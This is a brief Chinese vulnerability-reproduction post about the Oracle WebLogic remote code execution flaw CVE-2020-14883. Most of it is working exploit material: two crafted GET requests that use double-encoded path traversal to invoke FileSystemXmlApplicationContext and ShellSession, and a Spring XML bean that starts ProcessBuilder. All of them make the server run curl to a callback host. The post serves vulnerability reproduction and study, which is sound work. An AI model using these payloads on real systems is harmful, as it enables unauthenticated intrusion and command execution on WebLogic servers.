【漏洞复现】Weblogic 代码执行漏洞（CVE-2020-14883）

com.tangosol.coherence.mvel2.sh.ShellSession类只能在12.2.1.3.0以上版本利用，10.3.6.0.0可以用com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext类
通过此类，远程加载一个xml，执行命令。POC：GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.245.129:9999/1.xml") HTTP/1.1Host: 192.168.245.134:7001
XML:<?xml version="1.0" encoding="UTF-8" ?><beans xmlns="http://www.springframework.org/schema/beans"   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">        <constructor-arg>          <list>            <value>curl</value>            <value>http://192.168.245.129:9999/123</value>           </list>        </constructor-arg>    </bean></beans>

GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('curl+http://192.168.245.129:9999/456789');") HTTP/1.1Host: 192.168.245.134:7001